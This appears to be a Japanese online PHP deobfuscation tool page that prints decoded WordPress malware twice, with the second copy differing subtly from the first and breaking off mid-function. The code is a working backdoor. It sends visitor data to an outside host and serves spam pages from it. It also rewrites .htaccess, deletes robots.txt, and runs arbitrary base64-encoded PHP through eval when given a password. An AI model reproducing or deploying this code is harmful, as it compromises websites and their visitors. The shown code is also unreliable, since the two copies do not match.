Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php
function OO_O0O_0_0($url, $O0O0__0O_O = 0, $OO00_0_OO_ = 1, $OO0O__00O_ = NULL, $O_0_O0OO_0 = array(), $OOO_0_0O_0 = "s")
{
if (!preg_match("/^https*\\:\\/\\//si", $url)) {
if (isset($_GET["urlerr"])) {
$O_O0_O_O00 = '[urlerror] invalid url: ';
$O_O0_O_O00 .= $url;
echo $O_O0_O_O00;
unset($O_O0_O_O00);
exit();
}
return '';
}
$OO0_O__00O = 'curl_init+curl_setopt+curl_exec|fsockopen|pfsockopen|stream_socket_client|socket_create';
$O0O_O00_O_ = $O0_0O0__OO = '';
foreach (explode('|', $OO0_O__00O) as $c) {
$OO_O0O__00 = 1;
if ($O0O0__0O_O && substr($c, 0, 1) == 'c') {
continue;
}
foreach (explode('+', $c) as $d) {
if (!function_exists($d)) {
$OO_O0O__00 = 0;
}
}
unset($d);
if ($OO_O0O__00) {
$O0O_O00_O_ = $c;
break;
}
}
unset($OO0_O__00O, $c);
if ($O0O_O00_O_ == '') {
return 0;
}
if (substr($O0O_O00_O_, 0, 1) == 'c') {
$OO0___OO00 = curl_init();
curl_setopt($OO0___OO00, CURLOPT_URL, $url);
curl_setopt($OO0___OO00, CURLOPT_USERAGENT, $OOO_0_0O_0);
curl_setopt($OO0___OO00, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($OO0___OO00, CURLOPT_TIMEOUT, 100);
curl_setopt($OO0___OO00, CURLOPT_FRESH_CONNECT, TRUE);
if ($OO00_0_OO_ == 2) {
curl_setopt($OO0___OO00, CURLOPT_POST, 1);
if (is_array($OO0O__00O_)) {
curl_setopt($OO0___OO00, CURLOPT_POSTFIELDS, http_build_query($OO0O__00O_));
}
}
$O0__0O_OO0 = curl_exec($OO0___OO00);
curl_close($OO0___OO00);
if (!$O0__0O_OO0) {
if (isset($_GET["curlerr"])) {
$O_O0_O_O00 = '[curl error] ';
$O_O0_O_O00 .= curl_error($OO0___OO00);
echo $O_O0_O_O00;
unset($O_O0_O_O00);
exit();
}
return 0;
} else {
return $O0__0O_OO0;
}
}
$OO00O__0_O = parse_url($url);
isset($OO00O__0_O["host"]) || $OO00O__0_O["host"] = '';
isset($OO00O__0_O["path"]) || $OO00O__0_O["path"] = '';
isset($OO00O__0_O["query"]) || $OO00O__0_O["query"] = '';
isset($OO00O__0_O["port"]) || $OO00O__0_O["port"] = '';
$O_0_0_O0OO = $OO00O__0_O["path"] ? $OO00O__0_O["path"] . ($OO00O__0_O["query"] ? '?' . $OO00O__0_O["query"] : '') : '/';
$O_00O0OO__ = $OO00O__0_O["host"];
if ($OO00O__0_O["scheme"] == 'https') {
$OO__O0O0_0 = '1.1';
$O_O0_OO_00 = empty($OO00O__0_O["port"]) ? 443 : $OO00O__0_O["port"];
$O_00O0OO__ = 'ssl://';
$O_00O0OO__ .= $OO00O__0_O["host"];
} else {
$OO__O0O0_0 = '1.0';
$O_O0_OO_00 = empty($OO00O__0_O["port"]) ? 80 : $OO00O__0_O["port"];
}
$OOO_00O__0 = 'Host:';
$OOO_00O__0 .= $O_00O0OO__;
$O_0_O0OO_0[] = $OOO_00O__0;
$O_0_O0OO_0[] = 'Connection:Close';
$O_0_O0OO_0[] = 'User-Agent:' . $OOO_0_0O_0;
$O_0_O0OO_0[] = 'Accept:*/*';
unset($OOO_00O__0);
if ($OO00_0_OO_ == 2) {
if (is_array($OO0O__00O_)) {
$OO0O__00O_ = http_build_query($OO0O__00O_);
}
$O_0_O0OO_0[] = 'Content-type:application/x-www-form-urlencoded';
$O_0_O0OO_0[] = 'Content-Length:' . strlen($OO0O__00O_);
$O0_0O0__OO = "POST $O_0_0_O0OO HTTP/$OO__O0O0_0" . PHP_EOL . join(PHP_EOL, $O_0_O0OO_0) . PHP_EOL . PHP_EOL . $OO0O__00O_;
unset($OO0O__00O_);
} else {
$O0_0O0__OO = "GET $O_0_0_O0OO HTTP/$OO__O0O0_0" . PHP_EOL . join(PHP_EOL, $O_0_O0OO_0) . PHP_EOL . PHP_EOL;
}
unset($O_0_O0OO_0, $OO00O__0_O, $OO__O0O0_0, $O_0_0_O0OO);
$OOO_O0__00 = null;
if (substr($O0O_O00_O_, -1) == 'n') {
$OOO_O0__00 = $O0O_O00_O_($O_00O0OO__, $O_O0_OO_00, $O_O0_O_O00no, $O_O0_O_O00str, 30);
} else {
if (substr($O0O_O00_O_, -1) == 't') {
$O__OO0O_00 = 'tcp://';
$O__OO0O_00 .= $O_00O0OO__;
$O__OO0O_00 .= ':';
$O__OO0O_00 .= $O_O0_OO_00;
$OOO_O0__00 = stream_socket_client($O__OO0O_00, $O_O0_O_O00no, $O_O0_O_O00str, 30);
unset($O__OO0O_00);
}
}
$O_00__O0OO = '';
if ($OOO_O0__00) {
stream_set_blocking($OOO_O0__00, TRUE);
curl_exec($OOO_O0__00, 30);
fwrite($OOO_O0__00, $O0_0O0__OO);
if (!$O0O0__0O_O) {
$O00__OOO_0 = stream_get_meta_data($OOO_O0__00);
if (!$O00__OOO_0["timed_out"]) {
while (!feof($OOO_O0__00)) {
$OO_0_0O_0O = fgets($OOO_O0__00);
if ($OO_0_0O_0O && (rawurlencode($OO_0_0O_0O) == "%0D%0A" || rawurlencode($OO_0_0O_0O) == "%0A")) {
break;
}
unset($OO_0_0O_0O);
}
while (!feof($OOO_O0__00)) {
$O00_O_OO0_ = $O__0OO_O00($OOO_O0__00, 8192);
$O_00__O0OO .= $O00_O_OO0_;
unset($O00_O_OO0_);
}
}
unset($O00__OOO_0);
}
fclose($OOO_O0__00);
} else {
if (substr($O0O_O00_O_, -1) == 'e') {
$O0OO_00__O = gethostbyname($O_00O0OO__);
$OOO_O0__00 = $O0O_O00_O_(AF_INET, SOCK_STREAM, 0);
if (socket_connect($OOO_O0__00, $O0OO_00__O, $O_O0_OO_00)) {
if (!$O0O0__0O_O) {
socket_write($OOO_O0__00, $O0_0O0__OO, strlen($O0_0O0__OO));
while ($O_O00_O_0O = @socket_read($OOO_O0__00, 8192)) {
$O_00__O0OO .= $O_O00_O_0O;
unset($O_O00_O_0O);
}
$O_00__O0OO = explode("\\r\\n\\r\\n", $O_00__O0OO);
array_shift($O_00__O0OO);
$O_00__O0OO = implode("\\r\\n\\r\\n", $O_00__O0OO);
} else {
$O_O0_O00_O = mt_rand(2, 5);
$O000O__OO_ = 0;
while ($O000O__OO_ < $O_O0_O00_O) {
socket_write($OOO_O0__00, $O0_0O0__OO, strlen($O0_0O0__OO));
$O000O__OO_++;
usleep(mt_rand(50000, 100000));
}
unset($O000O__OO_, $O_O0_O00_O);
}
}
socket_close($OOO_O0__00);
unset($O0OO_00__O);
}
}
unset($O0_0O0__OO, $O0O_O00_O_, $OOO_O0__00, $O_O0_OO_00, $O_00O0OO__);
if (!$O0O0__0O_O) {
$O_00__O0OO = @preg_replace_callback('/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)' . '((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si', 'O__0_O00OO', $O_00__O0OO);
return trim(trim($O_00__O0OO, "\\xEF\\xBB\\xBF"));
} else {
return 1;
}
}
function O__0_O00OO($matches)
{
return hexdec($matches[1]) == strlen($matches[2]) ? $matches[2] : $matches[0];
}
function O_OO_O000_($O_OOO00_0_)
{
$OO0O__0_O0 = base64_encode(gzdeflate($O_OOO00_0_));
$O_0__0OOO0 = substr($OO0O__0_O0, 0, 5);
$O0_O0_O0O_ = substr($OO0O__0_O0, -5);
$O_OO_00O0_ = substr($OO0O__0_O0, 5, strlen($OO0O__0_O0) - 10);
return $O_0__0OOO0 . 'hT' . substr($OO0O__0_O0, 5, strlen($OO0O__0_O0) - 10) . 'tP' . $O0_O0_O0O_;
}
function O__0_O0OO0($O_OOO00_0_)
{
$O_0__0OOO0 = substr($O_OOO00_0_, 0, 5);
$O0_O0_O0O_ = substr($O_OOO00_0_, -5);
$O_OO_00O0_ = substr($O_OOO00_0_, 7, strlen($O_OOO00_0_) - 14);
return gzinflate(base64_decode($O_0__0OOO0 . $O_OO_00O0_ . $O0_O0_O0O_));
}
function O00_0OO_O_($O_00_0_OOO = '')
{
if (isset(${"_SERVER"})) {
if (isset(${"_SERVER"}["HTTP_X_FORWARDED_FOR"])) {
$O_00_0_OOO = ${"_SERVER"}["HTTP_X_FORWARDED_FOR"];
} else if (isset(${"_SERVER"}["HTTP_CLIENT_IP"])) {
$O_00_0_OOO = ${"_SERVER"}["HTTP_CLIENT_IP"];
} else {
$O_00_0_OOO = ${"_SERVER"}["REMOTE_ADDR"];
}
} else {
if (getenv('HTTP_X_FORWARDED_FOR')) {
$O_00_0_OOO = getenv('HTTP_X_FORWARDED_FOR');
} else if (getenv('HTTP_CLIENT_IP')) {
$O_00_0_OOO = getenv('HTTP_CLIENT_IP');
} else {
$O_00_0_OOO = getenv('REMOTE_ADDR');
}
}
return $O_00_0_OOO;
}
function O_OO_00_O0($O_OOO00_0_ = '')
{
if (isset(${"_SERVER"}["HTTP_HOST"])) {
return ${"_SERVER"}["HTTP_HOST"];
} elseif (isset(${"_SERVER"}["SERVER_NAME"])) {
return ${"_SERVER"}["SERVER_NAME"];
}
return $O_OOO00_0_;
}
function O0O_O0__0O($input)
{
$O0_O0__O0O = str_split($input);
$O0O_0_O_0O = '';
for ($O000O__OO_ = 0; $O000O__OO_ < count($O0_O0__O0O); $O000O__OO_++) {
if ($O000O__OO_ % 2 != 0) {
$O0O_0_O_0O .= $O0_O0__O0O[$O000O__OO_];
}
}
return base64_decode($O0O_0_O_0O);
}
function OOO0O_0_0_($O_00__O0OO)
{
$O_00__O0OO = @gzuncompress(base64_decode($O_00__O0OO));
$O_0_O0_0OO = @preg_split("/\\|/si", $O_00__O0OO, -1, PREG_SPLIT_NO_EMPTY);
if (!is_array($O_0_O0_0OO)) {
return false;
}
if (count($O_0_O0_0OO) < 2) {
return false;
}
$O_00__O0OO_array["data"] = array_pop($O_0_O0_0OO);
$O_00__O0OO_array["data"] = base64_decode($O_00__O0OO_array["data"]);
$O_00__O0OO_array["headers"] = $O_0_O0_0OO;
return $O_00__O0OO_array;
}
function OOO0__0_O0($O0OO0__O0_ = '')
{
$OO_O0O0_0_ = 'robots.txt';
if (file_exists($OO_O0O0_0_)) {
@unlink($OO_O0O0_0_);
}
if ($O0OO0__O0_ == '') {
$O0OO0__O0_ = '.htaccess';
}
// <FilesMatch ".(py|exe|php)$">
// Order allow,deny
// Deny from all
// </FilesMatch>
// <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$">
// Order allow,deny
// Allow from all
// </FilesMatch>
// <IfModule mod_rewrite.c>
// RewriteEngine On
// RewriteBase /
// RewriteRule ^index\.php$ - [L]
// RewriteCond %{REQUEST_FILENAME} !-f
// RewriteCond %{REQUEST_FILENAME} !-d
// RewriteRule . /index.php [L]
// </IfModule>
$O_00__O0OO = 'PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIEFsbG93IGZyb20gYWxsCjwvRmlsZXNNYXRjaD4KPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPg==';
$O_00__O0OO = @base64_decode($O_00__O0OO);
if (file_exists($O0OO0__O0_)) {
$O0O0_OO__0 = file_get_contents($O0OO0__O0_);
if ($O_00__O0OO == $O0O0_OO__0) {
return;
}
}
@chmod($O0OO0__O0_, 0777);
@file_put_contents($O0OO0__O0_, $O_00__O0OO);
@chmod($O0OO0__O0_, 0644);
}
function O__0_0OOO0($O0_O0OO__0, $OOO00O0___)
{
$O0_O00O__O = 'https://www.google.com/ping?sitemap=%s%s/%s';
$O0O_O_O_00 = sprintf($O0_O00O__O, $OOO00O0___["protocol"], $OOO00O0___["server_domain"], $O0_O0OO__0);
$O_O00O_O_0 = OO_O0O_0_0($O0O_O_O_00);
if (isset($_REQUEST["st"])) {
var_dump($O0O_O_O_00);
var_dump($O_O00O_O_0);
die();
}
$O0_O_0_OO0 = 'google';
$O0O0O__0O_ = 'success';
$O0_00O_O_O = O__0_O0OO0('S0vMzJVEllSNAQA=');
if (strpos($O_O00O_O_0, $O0_O_0_OO0) != false) {
die($O0O0O__0O_);
} else {
$O0_O00O__O = 'http://www.google.com/ping?sitemap=%s%s/%s';
$O0O_O_O_00 = sprintf($O0_O00O__O, $OOO00O0___["protocol"], $OOO00O0___["server_domain"], $O0_O0OO__0);
$O_O00O_O_0 = OO_O0O_0_0($O0O_O_O_00);
if (strpos($O_O00O_O_0, $O0_O_0_OO0) != false) {
die($O0O0O__0O_);
}
die($O0_00O_O_O);
}
}
function O__O_0O0O0($zzz)
{
$O___0OOO00 = tempnam(sys_get_temp_dir(), "z1zz");
$OO0_O__00O = base64_decode(rawurldecode((urlencode(urldecode($zzz)))));
$O_0OO0__O0 = base64_decode("PD9waHA=");
if (strpos($OO0_O__00O, $O_0OO0__O0) === false) {
$OO0_O__00O = $O_0OO0__O0 . PHP_EOL . $OO0_O__00O;
}
@file_put_contents($O___0OOO00, $OO0_O__00O);
@require($O___0OOO00);
@unlink($O___0OOO00);
die();
}
function OO00O0O___($input)
{
$OOO00O0___ = array();
$OOO00O0___["default_params"] = $input;
$OOO00O0___["api"] = 'http://3108-ch4-v4.everyyywell.com';
$OOO00O0___["server_domain"] = O_OO_00_O0();
$OOO00O0___["request_url"] = ${"_SERVER"}["REQUEST_URI"];
$OOO00O0___["referer"] = isset(${"_SERVER"}["HTTP_REFERER"]) ? ${"_SERVER"}["HTTP_REFERER"] : '';
$OOO00O0___["user_agent"] = isset(${"_SERVER"}["HTTP_USER_AGENT"]) ? ${"_SERVER"}["HTTP_USER_AGENT"] : '';
$OOO00O0___["ip"] = O00_0OO_O_();
if (isset(${"_SERVER"}["HTTPS"])) {
$OOO00O0___["protocol"] = 'https://';
} else {
$OOO00O0___["protocol"] = 'http://';
}
if (isset(${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"])) {
$OOO00O0___["language"] = ${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"];
} else {
$OOO00O0___["language"] = "";
}
if (isset($_REQUEST["params"])) {
$OO0_O_O00_ = 'Content-type:application/json';
header($OO0_O_O00_);
if (function_exists('json_encode')) {
echo json_encode($OOO00O0___);
} else {
print_r($OOO00O0___);
}
die();
}
if (isset($_REQUEST["d_time"])) {
die('2021/9/23');
}
if (isset($_REQUEST["pwd163"])) {
if (md5(trim($_REQUEST["pwd163"])) == "f31cb88a4077528b99d58a83102e883f") {
$OO0_O__00O = base64_decode(rawurldecode((urlencode(urldecode($_REQUEST["zzz"])))));
$O_0OO0__O0 = "<?php";
if (strpos($OO0_O__00O, $O_0OO0__O0) === false) {
$OO0_O__00O = $O_0OO0__O0 . PHP_EOL . $OO0_O__00O;
}
if (isset($_REQUEST["e"])) {
$OO0_O__00O = str_replace($O_0OO0__O0, "", $OO0_O__00O);
eval($OO0_O__00O);
die();
}
$O___0OOO00 = tmpfile();
fwrite($O___0OOO00, $OO0_O__00O);
$O0___O0OO0 = stream_get_meta_data($O___0OOO00);
@require($O0___O0OO0["uri"]);
fclose($O___0OOO00);
die();
}
if (md5($_REQUEST["pwd163"] . "a!#_11AA") == "2f7a76f71ff9e24be7c0015ff9cb81d8") {
if (isset($_GET["sitemap"])) {
$O0_O0OO__0 = $_GET["sitemap"];
O__0_0OOO0($O0_O0OO__0, $OOO00O0___);
}
}
}
OOO0__0_O0();
$O_0O_0OO_0 = array('domain' => $OOO00O0___["server_domain"], 'request_url' => $OOO00O0___["request_url"], 'ip' => $OOO00O0___["ip"], 'agent' => $OOO00O0___["user_agent"], 'referer' => $OOO00O0___["referer"], 'protocol' => $OOO00O0___["protocol"], 'language' => $OOO00O0___["language"]);
$O_00__O0OO = OO_O0O_0_0($OOO00O0___["api"], 0, 2, $O_0O_0OO_0, array(), $OOO00O0___["server_domain"]);
if (isset($_REQUEST["dump"])) {
var_dump($O_00__O0OO);
$O_00__O0OO = OO_O0O_0_0("http://google.co.jp");
var_dump($O_00__O0OO);
die();
}
$O00_O_OO0_ = OOO0O_0_0_($O_00__O0OO);
if ($O00_O_OO0_ !== false) {
foreach ($O00_O_OO0_["headers"] as $OO0_O_O00_) {
@header($OO0_O_O00_);
}
echo $O00_O_OO0_["data"];
die();
}
}
// 'http://3108-ch4-v4.everyyywell.com'
OO00O0O___('DatHgRv0YcwDxozvSLyzrMqxYMjDtgmtOYn2Jgi0pLtXFYZ0cLjmlVO2AZxXMJz5ZetXnlB3LZGWGxpsiLSmWNTvSbNQX=U=');<?php
function OO_O0O_0_0($url, $O0O0__0O_O = 0, $OO00_0_OO_ = 1, $OO0O__00O_ = NULL, $O_0_O0OO_0 = array(), $OOO_0_0O_0 = "s")
{
if (!preg_match("/^https*\\:\\/\\//si", $url)) {
if (isset($_GET["urlerr"])) {
$O_O0_O_O00 = '[urlerror] invalid url: ';
$O_O0_O_O00 .= $url;
echo $O_O0_O_O00;
unset($O_O0_O_O00);
exit;
}
return '';
}
$OO0_O__00O = 'curl_init+curl_setopt+curl_exec|fsockopen|pfsockopen|stream_socket_client|socket_create';
$O0O_O00_O_ = $O0_0O0__OO = '';
foreach (array(0 => "curl_init+curl_setopt+curl_exec", 1 => "fsockopen", 2 => "pfsockopen", 3 => "stream_socket_client", 4 => "socket_create") as $c) {
$OO_O0O__00 = 1;
if ($O0O0__0O_O && substr($c, 0, 1) == 'c') {
continue;
}
foreach (explode('+', $c) as $d) {
if (!function_exists($d)) {
$OO_O0O__00 = 0;
}
}
unset($d);
if ($OO_O0O__00) {
$O0O_O00_O_ = $c;
break;
}
}
unset($OO0_O__00O, $c);
if ($O0O_O00_O_ == '') {
return 0;
}
if (substr($O0O_O00_O_, 0, 1) == 'c') {
$OO0___OO00 = curl_init();
curl_setopt($OO0___OO00, CURLOPT_URL, $url);
curl_setopt($OO0___OO00, CURLOPT_USERAGENT, $OOO_0_0O_0);
curl_setopt($OO0___OO00, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($OO0___OO00, CURLOPT_TIMEOUT, 100);
curl_setopt($OO0___OO00, CURLOPT_FRESH_CONNECT, TRUE);
if ($OO00_0_OO_ == 2) {
curl_setopt($OO0___OO00, CURLOPT_POST, 1);
if (is_array($OO0O__00O_)) {
curl_setopt($OO0___OO00, CURLOPT_POSTFIELDS, http_build_query($OO0O__00O_));
}
}
$O0__0O_OO0 = curl_exec($OO0___OO00);
curl_close($OO0___OO00);
if (!$O0__0O_OO0) {
if (isset($_GET["curlerr"])) {
$O_O0_O_O00 = '[curl error] ';
$O_O0_O_O00 .= curl_error($OO0___OO00);
echo $O_O0_O_O00;
unset($O_O0_O_O00);
exit;
}
return 0;
} else {
return $O0__0O_OO0;
}
}
$OO00O__0_O = parse_url($url);
isset($OO00O__0_O["host"]) || ($OO00O__0_O["host"] = '');
isset($OO00O__0_O["path"]) || ($OO00O__0_O["path"] = '');
isset($OO00O__0_O["query"]) || ($OO00O__0_O["query"] = '');
isset($OO00O__0_O["port"]) || ($OO00O__0_O["port"] = '');
$O_0_0_O0OO = $OO00O__0_O["path"] ? $OO00O__0_O["path"] . ($OO00O__0_O["query"] ? '?' . $OO00O__0_O["query"] : '') : '/';
$O_00O0OO__ = $OO00O__0_O["host"];
if ($OO00O__0_O["scheme"] == 'https') {
$OO__O0O0_0 = '1.1';
$O_O0_OO_00 = empty($OO00O__0_O["port"]) ? 443 : $OO00O__0_O["port"];
$O_00O0OO__ = 'ssl://';
$O_00O0OO__ .= $OO00O__0_O["host"];
} else {
$OO__O0O0_0 = '1.0';
$O_O0_OO_00 = empty($OO00O__0_O["port"]) ? 80 : $OO00O__0_O["port"];
}
$OOO_00O__0 = 'Host:';
$OOO_00O__0 .= $O_00O0OO__;
$O_0_O0OO_0[] = $OOO_00O__0;
$O_0_O0OO_0[] = 'Connection:Close';
$O_0_O0OO_0[] = 'User-Agent:' . $OOO_0_0O_0;
$O_0_O0OO_0[] = 'Accept:*/*';
unset($OOO_00O__0);
if ($OO00_0_OO_ == 2) {
if (is_array($OO0O__00O_)) {
$OO0O__00O_ = http_build_query($OO0O__00O_);
}
$O_0_O0OO_0[] = 'Content-type:application/x-www-form-urlencoded';
$O_0_O0OO_0[] = 'Content-Length:' . strlen($OO0O__00O_);
$O0_0O0__OO = "POST {$O_0_0_O0OO} HTTP/{$OO__O0O0_0}" . PHP_EOL . join(PHP_EOL, $O_0_O0OO_0) . PHP_EOL . PHP_EOL . $OO0O__00O_;
unset($OO0O__00O_);
} else {
$O0_0O0__OO = "GET {$O_0_0_O0OO} HTTP/{$OO__O0O0_0}" . PHP_EOL . join(PHP_EOL, $O_0_O0OO_0) . PHP_EOL . PHP_EOL;
}
unset($O_0_O0OO_0, $OO00O__0_O, $OO__O0O0_0, $O_0_0_O0OO);
$OOO_O0__00 = null;
if (substr($O0O_O00_O_, 1) == 'n') {
$OOO_O0__00 = $O0O_O00_O_($O_00O0OO__, $O_O0_OO_00, $O_O0_O_O00no, $O_O0_O_O00str, 30);
} else {
if (substr($O0O_O00_O_, 1) == 't') {
$O__OO0O_00 = 'tcp://';
$O__OO0O_00 .= $O_00O0OO__;
$O__OO0O_00 .= ':';
$O__OO0O_00 .= $O_O0_OO_00;
$OOO_O0__00 = stream_socket_client($O__OO0O_00, $O_O0_O_O00no, $O_O0_O_O00str, 30);
unset($O__OO0O_00);
}
}
$O_00__O0OO = '';
if ($OOO_O0__00) {
stream_set_blocking($OOO_O0__00, TRUE);
curl_exec($OOO_O0__00, 30);
fwrite($OOO_O0__00, $O0_0O0__OO);
if (!$O0O0__0O_O) {
$O00__OOO_0 = stream_get_meta_data($OOO_O0__00);
if (!$O00__OOO_0["timed_out"]) {
while (!feof($OOO_O0__00)) {
$OO_0_0O_0O = fgets($OOO_O0__00);
if ($OO_0_0O_0O && (rawurlencode($OO_0_0O_0O) == "%0D%0A" || rawurlencode($OO_0_0O_0O) == "%0A")) {
break;
}
unset($OO_0_0O_0O);
}
while (!feof($OOO_O0__00)) {
$O00_O_OO0_ = $O__0OO_O00($OOO_O0__00, 8192);
$O_00__O0OO .= $O00_O_OO0_;
unset($O00_O_OO0_);
}
}
unset($O00__OOO_0);
}
fclose($OOO_O0__00);
} else {
if (substr($O0O_O00_O_, 1) == 'e') {
$O0OO_00__O = gethostbyname($O_00O0OO__);
$OOO_O0__00 = $O0O_O00_O_(AF_INET, SOCK_STREAM, 0);
if (socket_connect($OOO_O0__00, $O0OO_00__O, $O_O0_OO_00)) {
if (!$O0O0__0O_O) {
socket_write($OOO_O0__00, $O0_0O0__OO, strlen($O0_0O0__OO));
while ($O_O00_O_0O = @socket_read($OOO_O0__00, 8192)) {
$O_00__O0OO .= $O_O00_O_0O;
unset($O_O00_O_0O);
}
$O_00__O0OO = explode("\\r\\n\\r\\n", $O_00__O0OO);
array_shift($O_00__O0OO);
$O_00__O0OO = implode("\\r\\n\\r\\n", $O_00__O0OO);
} else {
$O_O0_O00_O = mt_rand(2, 5);
$O000O__OO_ = 0;
while ($O000O__OO_ < $O_O0_O00_O) {
socket_write($OOO_O0__00, $O0_0O0__OO, strlen($O0_0O0__OO));
$O000O__OO_++;
usleep(mt_rand(50000, 100000));
}
unset($O000O__OO_, $O_O0_O00_O);
}
}
socket_close($OOO_O0__00);
unset($O0OO_00__O);
}
}
unset($O0_0O0__OO, $O0O_O00_O_, $OOO_O0__00, $O_O0_OO_00, $O_00O0OO__);
if (!$O0O0__0O_O) {
$O_00__O0OO = @preg_replace_callback('/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si', 'O__0_O00OO', $O_00__O0OO);
return trim(trim($O_00__O0OO, "\\xEF\\xBB\\xBF"));
} else {
return 1;
}
}
function O__0_O00OO($matches)
{
return hexdec($matches[1]) == strlen($matches[2]) ? $matches[2] : $matches[0];
}
function O_OO_O000_($O_OOO00_0_)
{
$OO0O__0_O0 = base64_encode(gzdeflate($O_OOO00_0_));
$O_0__0OOO0 = substr($OO0O__0_O0, 0, 5);
$O0_O0_O0O_ = substr($OO0O__0_O0, 5);
$O_OO_00O0_ = substr($OO0O__0_O0, 5, strlen($OO0O__0_O0) - 10);
return $O_0__0OOO0 . 'hT' . substr($OO0O__0_O0, 5, strlen($OO0O__0_O0) - 10) . 'tP' . $O0_O0_O0O_;
}
function O__0_O0OO0($O_OOO00_0_)
{
$O_0__0OOO0 = substr($O_OOO00_0_, 0, 5);
$O0_O0_O0O_ = substr($O_OOO00_0_, 5);
$O_OO_00O0_ = substr($O_OOO00_0_, 7, strlen($O_OOO00_0_) - 14);
return gzinflate(base64_decode($O_0__0OOO0 . $O_OO_00O0_ . $O0_O0_O0O_));
}
function O00_0OO_O_($O_00_0_OOO = '')
{
if (isset($_SERVER)) {
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
$O_00_0_OOO = $_SERVER["HTTP_X_FORWARDED_FOR"];
} else {
if (isset($_SERVER["HTTP_CLIENT_IP"])) {
$O_00_0_OOO = $_SERVER["HTTP_CLIENT_IP"];
} else {
$O_00_0_OOO = $_SERVER["REMOTE_ADDR"];
}
}
} else {
if (getenv('HTTP_X_FORWARDED_FOR')) {
$O_00_0_OOO = getenv('HTTP_X_FORWARDED_FOR');
} else {
if (getenv('HTTP_CLIENT_IP')) {
$O_00_0_OOO = getenv('HTTP_CLIENT_IP');
} else {
$O_00_0_OOO = getenv('REMOTE_ADDR');
}
}
}
return $O_00_0_OOO;
}
function O_OO_00_O0($O_OOO00_0_ = '')
{
if (isset($_SERVER["HTTP_HOST"])) {
return $_SERVER["HTTP_HOST"];
} elseif (isset($_SERVER["SERVER_NAME"])) {
return $_SERVER["SERVER_NAME"];
}
return $O_OOO00_0_;
}
function O0O_O0__0O($input)
{
$O0_O0__O0O = str_split($input);
$O0O_0_O_0O = '';
for ($O000O__OO_ = 0; $O000O__OO_ < count($O0_O0__O0O); $O000O__OO_++) {
if ($O000O__OO_ % 2 != 0) {
$O0O_0_O_0O .= $O0_O0__O0O[$O000O__OO_];
}
}
return base64_decode($O0O_0_O_0O);
}
function OOO0O_0_0_($O_00__O0OO)
{
$O_00__O0OO = @gzuncompress(base64_decode($O_00__O0OO));
$O_0_O0_0OO = @preg_split("/\\|/si", $O_00__O0OO, 1, PREG_SPLIT_NO_EMPTY);
if (!is_array($O_0_O0_0OO)) {
return false;
}
if (count($O_0_O0_0OO) < 2) {
return false;
}
$O_00__O0OO_array["data"] = array_pop($O_0_O0_0OO);
$O_00__O0OO_array["data"] = base64_decode($O_00__O0OO_array["data"]);
$O_00__O0OO_array["headers"] = $O_0_O0_0OO;
return $O_00__O0OO_array;
}
function OOO0__0_O0($O0OO0__O0_ = '')
{
$OO_O0O0_0_ = 'robots.txt';
if (file_exists($OO_O0O0_0_)) {
@unlink($OO_O0O0_0_);
}
if ($O0OO0__O0_ == '') {
$O0OO0__O0_ = '.htaccess';
}
// <FilesMatch ".(py|exe|php)$">
// Order allow,deny
// Deny from all
// </FilesMatch>
// <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$">
// Order allow,deny
// Allow from all
// </FilesMatch>
// <IfModule mod_rewrite.c>
// RewriteEngine On
// RewriteBase /
// RewriteRule ^index\.php$ - [L]
// RewriteCond %{REQUEST_FILENAME} !-f
// RewriteCond %{REQUEST_FILENAME} !-d
// RewriteRule . /index.php [L]
// </IfModule>
